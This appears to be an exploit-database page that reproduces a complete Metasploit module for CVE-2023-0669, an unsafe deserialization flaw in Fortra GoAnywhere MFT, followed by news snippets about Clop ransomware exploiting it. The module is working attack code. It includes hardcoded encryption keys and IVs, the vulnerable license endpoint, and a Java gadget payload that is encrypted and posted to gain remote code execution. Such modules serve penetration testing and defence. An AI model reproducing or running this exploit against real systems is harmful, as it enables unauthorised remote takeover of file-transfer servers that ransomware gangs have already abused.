Headline
Fortra GoAnywhere MFT Unsafe Deserialization Remote Code Execution
This Metasploit module exploits an object deserialization vulnerability in Fortra GoAnywhere MFT.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::JavaDeserialization def initialize(info = {}) super( update_info( info, 'Name' => 'Fortra GoAnywhere MFT Unsafe Deserialization RCE', 'Description' => %q{ This module exploits CVE-2023-0669, which is an object deserialization vulnerability in Fortra GoAnywhere MFT. }, 'Author' => [ 'Ron Bowes', # Analysis and module ], 'References' => [ ['CVE', '2023-0669'], ['URL', 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'], ], 'DisclosureDate' => '2023-02-01', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'win'], 'Arch' => [ARCH_CMD], 'Privileged' => false, 'Targets' => [ [ 'Version 2 Encryption', { 'DefaultOptions' => { 'Version' => '$2', 'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca', 'EncryptionIv' => '4145532f4342432f504b435335506164' } }, ], [ 'Version 1 Encryption', { 'DefaultOptions' => { 'Version' => '', 'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b', 'EncryptionIv' => '4145532f4342432f504b435335506164' } } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8001, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Unsafe deserialization endpoint', '/goanywhere/lic/accept']), ]) register_advanced_options([ OptString.new('Version', [false, 'A version value to append to the encrypted data']), OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/), OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/), OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC']) ]) end def build_cipher unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) } raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' }) end cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm']) cipher.encrypt option_errors = {} iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join unless cipher.iv_len == iv.length option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})." end key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join unless cipher.key_len == key.length option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})." end raise Msf::OptionValidateError, option_errors unless option_errors.empty? cipher.iv = iv cipher.key = key cipher end def exploit vprint_status('Generating a serialized Java object with the payload') obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload) vprint_status('Encrypting the payload') cipher = build_cipher obj = cipher.update(obj) + cipher.final vprint_status('Sending request to the server') res = send_request_cgi( 'method' => 'POST', 'uri' => datastore['TARGETURI'], 'vars_post' => { 'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}" } ) fail_with(Failure::Unreachable, 'No response received from the target.') unless res if res.code != 500 fail_with(Failure::UnexpectedReply, "Expected the server to return HTTP/500, instead received HTTP/#{res.code}") end endend
Related news
Based on a comprehensive review of more than a dozen prominent ransomware groups, we identified several commonalities in TTPs, along with several notable differences and outliers.
A critical security flaw has been disclosed in Fortra's GoAnywhere Managed File Transfer (MFT) software that could be abused to create a new administrator user. Tracked as CVE-2024-0204, the issue carries a CVSS score of 9.8 out of 10. "Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal," Fortra&
Ransomware was the second most-observed threat this quarter, accounting for 17 percent of engagements, a slight increase from last quarter’s 10 percent.
Goanywhere Encryption Helper version 7.1.1 suffers from a remote code execution vulnerability.
After several weeks and more than 130 ransomware victims, GoAnywhere parent company Forta issues a statement.
Categories: News Categories: Ransomware Tags: Rubrik Tags: GoAnywhere MFT Tags: Fortra Tags: Clop ransomware Tags: Clop Tags: ransomware Tags: CVE-2023-0669 Tags: zero-day Rubrik, a cloud data management company, has revealed that Clop made use of an infamous GoAnywhere flaw. (Read more...) The post Rubrik is latest victim of the Clop ransomware zero-day campaign appeared first on Malwarebytes Labs.
Categories: Exploits and vulnerabilities Categories: News Categories: Ransomware Tags: Clop Tags: ransomware Tags: GoAnywhere Tags: CVE-2023-0669 The Clop ransomware gang has claimed responsibility for attacking several GoAnywhere MFT customers by exploiting a vulnerability in the managed file transfer software's administrative interface. (Read more...) The post Clop ransomware is victimizing GoAnywhere MFT customers appeared first on Malwarebytes Labs.
App-based multi-factor authentication — which is still free on Twitter — is safer than SMS MFA. So in theory, forcing people to pay for it would make them less likely to use it and switch to the free option.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The list of shortcomings is as follows - CVE-2022-47986 (CVSS score: 9.8) - IBM Aspera Faspex Code Execution Vulnerability CVE-2022-41223 (CVSS score: 6.8) - Mitel MiVoice Connect Code Injection
Categories: News Categories: Ransomware Tags: Clop Tags: Clop ransomware Tags: ransomware Tags: GoAnywhere Tags: managed file transfer Tags: MFT Tags: Fortra Tags: CISA Tags: Known Exploited Vulnerabilities Catalog The Clop ransomware gang has claimed responsibility for a wave of attacks that exploited a zero-day in GoAnywhere MFT admin consoles. (Read more...) The post GoAnywhere zero-day opened door to Clop ransomware appeared first on Malwarebytes Labs.
Weeks after an exploit was first announced in a popular cloud-based file transfer service, could some organizations still be vulnerable? The answer is yes.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added three flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active abuse in the wild. Included among the three is CVE-2022-24990, a bug affecting TerraMaster network-attached storage (TNAS) devices that could lead to unauthenticated remote code execution with the highest privileges. Details
Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.